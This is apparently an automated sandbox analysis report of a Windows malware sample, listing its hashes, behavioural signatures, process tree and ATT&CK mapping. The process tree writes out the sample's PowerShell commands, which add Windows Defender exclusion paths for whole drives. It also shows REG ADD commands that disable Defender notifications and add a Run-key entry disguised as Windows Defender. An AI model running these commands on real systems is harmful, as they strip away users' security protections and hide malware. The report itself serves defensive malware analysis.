Overview
overview
10Static
static
100eac1dd90f...0d.exe
windows7-x64
100eac1dd90f...0d.exe
windows10-2004-x64
10119f9287f4...9c.exe
windows7-x64
10119f9287f4...9c.exe
windows10-2004-x64
10202588cc1d...10.exe
windows7-x64
10202588cc1d...10.exe
windows10-2004-x64
1028b51218b1...09.exe
windows7-x64
1028b51218b1...09.exe
windows10-2004-x64
10583c56547b...6a.exe
windows7-x64
3583c56547b...6a.exe
windows10-2004-x64
373782bd2a7...e8.exe
windows7-x64
1073782bd2a7...e8.exe
windows10-2004-x64
10d279fb4121...d7.exe
windows7-x64
10d279fb4121...d7.exe
windows10-2004-x64
10Analysis
-
max time kernel
120s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06/11/2024, 23:55
Behavioral task
behavioral1
Sample
0eac1dd90fbafb505a3b627d166d9ef62db4e2df68da9bbc2e39db0573ecd00d.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0eac1dd90fbafb505a3b627d166d9ef62db4e2df68da9bbc2e39db0573ecd00d.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
119f9287f46d3ed3888403c3c21054974a0e8926ef247fc065164a8d58303c9c.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
119f9287f46d3ed3888403c3c21054974a0e8926ef247fc065164a8d58303c9c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
583c56547b1a00fcb4c0f4920998e0c0ee812691c2bfae7a643dab639e7faa6a.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
583c56547b1a00fcb4c0f4920998e0c0ee812691c2bfae7a643dab639e7faa6a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
73782bd2a7e22ad9b0cf75db952caac03b1db76549dfa8d79d68af50056359e8.exe
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
73782bd2a7e22ad9b0cf75db952caac03b1db76549dfa8d79d68af50056359e8.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
d279fb4121b6a7e552133823a497b4d2502b1494bc0864e2c8689fe92eef7fd7.exe
Resource
win7-20240903-en
General
-
Target
28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe
-
Size
4.6MB
-
MD5
6c8e7b9edb130c9dab130f66f9bad1c3
-
SHA1
332e1d7efdf2dc5ecaf6349db417f143b48d60e3
-
SHA256
28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209
-
SHA512
74998f93ff487d554c7734e5e7be148a0811d71164447c2a6816469338cc1b00b201e28b2ae01aa3162f63f8908782626206d84a8d62bb64960d0aa8ef38f6c3
-
SSDEEP
98304:N1Mie3EZD4qxp6QQ7Xs/Vd28BfkFsIjfxVFms:N17ZDxpFQ7XYZfkFsEf8s
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2732 powershell.exe 1984 powershell.exe 528 powershell.exe 2168 powershell.exe 2348 powershell.exe 2980 powershell.exe -
Disables Task Manager via registry modification
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\DEFENDERSERVICE = "C:\\Users\\Admin\\AppData\\Local\\NEWDRIVERS2\\WindowsDefender.exe" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 2588 reg.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2348 powershell.exe 2980 powershell.exe 2732 powershell.exe 1984 powershell.exe 528 powershell.exe 2168 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2700 wrote to memory of 2420 2700 28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe 30 PID 2700 wrote to memory of 2420 2700 28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe 30 PID 2700 wrote to memory of 2420 2700 28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe 30 PID 2420 wrote to memory of 2348 2420 cmd.exe 32 PID 2420 wrote to memory of 2348 2420 cmd.exe 32 PID 2420 wrote to memory of 2348 2420 cmd.exe 32 PID 2420 wrote to memory of 2980 2420 cmd.exe 34 PID 2420 wrote to memory of 2980 2420 cmd.exe 34 PID 2420 wrote to memory of 2980 2420 cmd.exe 34 PID 2420 wrote to memory of 2732 2420 cmd.exe 35 PID 2420 wrote to memory of 2732 2420 cmd.exe 35 PID 2420 wrote to memory of 2732 2420 cmd.exe 35 PID 2420 wrote to memory of 1984 2420 cmd.exe 36 PID 2420 wrote to memory of 1984 2420 cmd.exe 36 PID 2420 wrote to memory of 1984 2420 cmd.exe 36 PID 2420 wrote to memory of 528 2420 cmd.exe 37 PID 2420 wrote to memory of 528 2420 cmd.exe 37 PID 2420 wrote to memory of 528 2420 cmd.exe 37 PID 2420 wrote to memory of 2168 2420 cmd.exe 38 PID 2420 wrote to memory of 2168 2420 cmd.exe 38 PID 2420 wrote to memory of 2168 2420 cmd.exe 38 PID 2420 wrote to memory of 1980 2420 cmd.exe 39 PID 2420 wrote to memory of 1980 2420 cmd.exe 39 PID 2420 wrote to memory of 1980 2420 cmd.exe 39 PID 2420 wrote to memory of 1976 2420 cmd.exe 40 PID 2420 wrote to memory of 1976 2420 cmd.exe 40 PID 2420 wrote to memory of 1976 2420 cmd.exe 40 PID 2420 wrote to memory of 2036 2420 cmd.exe 41 PID 2420 wrote to memory of 2036 2420 cmd.exe 41 PID 2420 wrote to memory of 2036 2420 cmd.exe 41 PID 2420 wrote to memory of 2588 2420 cmd.exe 42 PID 2420 wrote to memory of 2588 2420 cmd.exe 42 PID 2420 wrote to memory of 2588 2420 cmd.exe 42 PID 2420 wrote to memory of 1540 2420 cmd.exe 43 PID 2420 wrote to memory of 1540 2420 cmd.exe 43 PID 2420 wrote to memory of 1540 2420 cmd.exe 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe"C:\Users\Admin\AppData\Local\Temp\28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\NEWDRIVERS2\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "D:"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:/NEWDRIVERS"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\NEWDRIVERS2"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v DisableTaskMgr /t REG_DWORD /d 03⤵PID:1980
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /f /v DisableNotificationCenter /t REG_DWORD /d 13⤵PID:1976
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /f /v DisableEnhancedNotifications /t REG_DWORD /d 13⤵
- Modifies Windows Defender notification settings
PID:2036
-
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v DEFENDERSERVICE /t REG_SZ /d "C:\Users\Admin\AppData\Local\NEWDRIVERS2\WindowsDefender.exe"3⤵
- Adds Run key to start application
- Modifies registry key
PID:2588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\NEWDRIVERS2\rar.bat3⤵PID:1540
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5d3c39da2d7207deda43b50b864d711a6
SHA1524e21299fbd42ec1a615a5d67117312996c7922
SHA2568f803b854c5ae49b6529e08a507a575b695adf826d995ecddd55a315e12d8da7
SHA512f9e1337a2bf229bc454ff1972b50886baac93ea5f4bb0f8482eb4f9aa1183876973cc00ff9bc19e0cd067576e71224f70de9d27b04407087be5ef89180518cc7
-
Filesize
351B
MD5ce7ef89a43335bb80b9e9b0b67d1a904
SHA1d1abb8760f3f95744c457825ce89a6686dd094d6
SHA2568819312c4d6d83836551a96f3ba8f793db1b6caf573a4fdfc1f26cfc71a3116f
SHA512b03e4f0a3fb727a63583699e7b8a4735edc607d00ada573bc8c7eb6e03a3c386fbc94610a80ea78df857f345f2756a8bdd2e42e6236911f214ee15bf92984ac0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c34b7d58bf5fd98a1fb2d27e75f8433e
SHA15b91a120d402a1c065addd37397370ec1390aeb4
SHA256620b0e47c27243caa41e36d51119646802154212341a401e6b874b3d8cebd0f8
SHA5126976d6d98b86fe311fc9d332a65aa1f3bba7ace22dcfb0a05a833be54e164353ebde3d3a622fbe6e6ada4dcaf2160669669b868cb1a8d98a91a844ca959b904b